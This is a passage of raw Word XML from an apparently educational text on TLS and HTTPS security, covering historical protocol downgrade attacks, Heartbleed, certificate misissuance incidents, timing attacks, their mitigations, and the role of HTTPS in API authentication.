          <w:ilvl w:val="0"/>
          <w:numId w:val="925"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Attacker forces a protocol downgrade from TLS to SSL 3.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052EB5B6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="925"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Then exploits the padding oracle to decrypt cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFDBDD0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FREAK (2015):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0067C555" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="926"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Forced servers to use "export-grade" 512-bit RSA keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280A0F98" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="926"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>These keys are trivially breakable with modern hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2504F929" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logjam (2015):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD771EF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="927"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Forced use of 512-bit Diffie-Hellman groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463AC813" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="927"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Breakable in minutes with pre-computation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581A4A1B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How TLS 1.3 prevents ALL downgrade attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0399D969" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="928"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Removes all weak algorithms (no RC4, no DES, no export ciphers, no RSA key exchange).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40363E54" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="928"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Server includes a special sentinel value in the ServerHello random if it's capable of TLS 1.3 but the client only offered 1.2. If the client DOES support 1.3, it detects this and aborts (someone forced a downgrade).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C01E44B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="928"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The Finished message authenticates the entire handshake — any modification by an attacker is detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA011E5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.2 Heartbleed (2014) — Implementation Bug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADB79BF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it was:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> A bug in OpenSSL's heartbeat extension.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DA8276" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it worked:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CB95E6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="929"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client sends a heartbeat: "Here's 4 bytes: 'BIRD'. Echo it back."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724278C3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="929"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>But the client LIES about the length: "Here's 65535 bytes: 'BIRD'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1FBED5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="929"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Server reads 4 bytes from the message, then reads 65531 bytes of ADJACENT MEMORY and sends it all back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE8E419" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="929"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>That adjacent memory contains: private keys, session keys, user passwords, anything in the server's memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00834A29" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> ~17% of all HTTPS servers were vulnerable. Private keys were extractable remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C0A76A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lesson:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> TLS's cryptographic security is only as strong as the implementation. A single buffer overread bug exposed everything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E360E7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.3 Certificate Misissuance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62096997" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real incidents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E24A05F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="930"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DigiNotar (2011):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> CA compromised. Attackers issued certificates for *.google.com. Used for MITM attacks in Iran (intercepted Gmail). DigiNotar was removed from all trust stores (company went bankrupt).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E29202B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="930"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Symantec (2017):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Issued thousands of certificates without proper validation. Google Chrome gradually distrusted all Symantec certificates (multi-year phase-out).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC412A7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="930"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kazakhstan government (2019):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Forced citizens to install a government root CA to enable MITM of all HTTPS traffic. Browser vendors blocked the specific certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0C3C0E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33689F15" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="931"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Certificate Transparency (detect misissuance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FABB2BB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="931"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>CAA records (limit which CAs can issue for your domain).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F4A26D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="931"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Expect-CT header (require CT for your domain).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C07F80E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="931"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Multiple CA trust anchors reducing single-CA risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C3FD5D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.4 Timing Attacks Against TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DBAF2E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The concept:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> By measuring how long a server takes to respond to crafted inputs, an attacker can infer information about the secret key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DC3BC0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lucky Thirteen (2013):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ECE588" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>CBC mode padding verification took different amounts of time depending on whether padding was correct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452E4F66" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>By measuring response times precisely, attackers could decrypt ciphertext byte by byte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA8D05A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Constant-time implementations (all code paths take the same time regardless of input). AES-GCM avoids this class of attack entirely (no padding).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134DCD70" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="05337C48">
          <v:rect id="_x0000_i3988" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACEF2C4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. HTTPS for APIs — Design Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60442211" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.1 API Authentication Over HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DBD05A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Without HTTPS:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Any API authentication mechanism is futile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD4CEEE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="933"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>API keys in headers → intercepted in plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E13702E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="933"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>OAuth tokens → stolen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC367F5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="933"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Even HMAC-signed requests → the signature doesn't prevent eavesdropping on the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7577F446" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>With HTTPS + token-based auth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E30C35" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="934"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client authenticates (login) → receives JWT/OAuth token (over HTTPS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4257FA96" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="934"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client includes token in subsequent requests: Authorization: Bearer &lt;token&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44352236" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="934"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Token travels encrypted → cannot be intercepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456E43AA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="934"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Server validates token → processes request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3226A6A0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why HTTPS doesn't eliminate the need for authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD3281D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="935"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>HTTPS verifies the SERVER's identity (client knows it's talking to the real API).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B687CC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="935"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>But the server doesn't know WHO the client is from TLS alone (unless using mTLS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F847DD8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="935"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Authentication (tokens, API keys) tells the server the client's identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DC8E0D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="935"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>HTTPS makes authentication tokens SAFE to transmit.</w:t>
      </w:r>
    </w:p>
